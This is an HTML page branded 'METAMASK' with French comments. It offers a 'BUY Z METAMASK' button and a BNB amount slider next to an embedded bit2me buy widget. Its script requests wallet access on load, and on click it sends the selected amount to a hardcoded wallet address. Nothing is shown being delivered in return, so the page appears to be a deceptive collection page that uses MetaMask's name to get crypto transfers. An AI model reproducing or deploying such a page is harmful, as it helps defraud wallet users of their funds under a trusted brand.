<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>METAMASK</title>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://unpkg.com/@metamask/legacy-web3@latest/dist/metamask.web3.min.js"></script>
  <style>
    body {
      font-family: 'Arial', sans-serif;
      background-color: #fff;
      color: #000;
      display: flex;
      justify-content: center;
      align-items: flex-start; /* Aligner le contenu en haut */
      min-height: 50vh; 
    }

    .widget-container {
      background-color: #fff;
      border-radius: 8px; /* Coins arrondis */
      padding: 8px;
      box-shadow: 0 10px 19px rgba(0, 0, 0, 0);
      text-align: center;
      width: 380px;
      margin-top: 2px; 
    }

    .buy-button {
      color: #fff;
      background-color: #ff6200; /* Couleur de fond du bouton */
      border-color: #ff6200; /* Couleur de la bordure du bouton */
      text-transform: uppercase;
      font-size: 0.9rem; /* Taille du texte du bouton */
      cursor: pointer;
      border-radius: 4px;
      border: none;
      transition: background-color 0.3s ease;
      margin-bottom: 4px;
      margin-top: 1px;
      width: 72%;
      padding: 13px; /* Ajout de marge interne */
    }

    .buy-button:hover {
      background-color: #ff6200; /* Couleur de fond au survol */
    }
    .buy-button:active {
      transform: translateY(1px);
    }
    .quantity-slider {
      -webkit-appearance: none;
      appearance: none;
      width: calc(65% -8px);
      margin-top: 5px;
      margin-bottom: 0px;
      background-color: #ff6200;
      outline: none;
    }
    .quantity-slider::-webkit-slider-thumb {
      -webkit-appearance: none;
      appearance: none;
      width: 15px;
      height: 15px;
      cursor: pointer;
      background-color: transparent;
      background-image: url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><polygon fill="black" points="0,16 8,0 16,16"/></svg>');
    }

    .quantity-slider::-moz-range-thumb {
      width: 10px;
      height: 10px;
      border-radius: 700%;
      background: #000;
      cursor: pointer;
    }

    .quantity-label {
      font-size: 0.8rem;
      color: #000;
      margin-bottom: 4px;
    }

    .quantity-value {
      font-size: 1.3rem;
      font-weight: bold;
      color: #ff7f00;
      margin-bottom: 8px;
      display: inline-block; /* Permet de placer la quantité à côté de l'étiquette */
    }

    .status {
      font-size: 1.5rem;
      color: #ff7f00;
      margin-top: 1px;
    }

    iframe {
      width: calc(100% - 3px);
      height: 515px;
      margin-top: 2px;
      overflow-y: hidden;
    }
  </style>
</head>
<body>
  <div class="widget-container">
    <button class="buy-button"><B>BUY Z METAMASK<B></button>
    <div class="quantity-label">Quantité (BNB) :</div>
    <div class="quantity-value">0.0000</div>
    <input type="range" min="0" max="10000" step="1" value="0" class="quantity-slider">
    <div class="status" id="status"></div>
    <iframe src="https://bit2me.com/fr/widget/buy/v2?currency=BTC&amount=100&method=card" frameborder="0" scrolling="no"></iframe>
  </div>

  <script type="text/javascript">
    window.addEventListener('load', async () => {
      if (window.ethereum) {
        window.web3 = new Web3(ethereum);
        try {
          await ethereum.enable();
          initBuyButton()
        } catch (err) {
          $('#status').html('Accès au compte refusé')
        }
      } else if (window.web3) {
        window.web3 = new Web3(web3.currentProvider)
        initBuyButton()
      } else {    
      }
    })

    const initBuyButton = () => {
      $('.buy-button').click(() => {
        const paymentAddress = '0xC6A5F6DdbcfD183A33BC7970107C0510a4499523'
        const amountEth = parseFloat($('.quantity-value').text())
        web3.eth.sendTransaction({
          to: paymentAddress,
          value: web3.toWei(amountEth, 'ether')
        }, (err, transactionId) => {
          if  (err) {
            console.log('Paiement échoué', err)
            
          }
        })
      })

      $('.quantity-slider').on('input', function() {
        const value = parseFloat($(this).val() / 10000).toFixed(4);
        $('.quantity-value').text(value);
      });
    }
  </script>
</body>
</html>
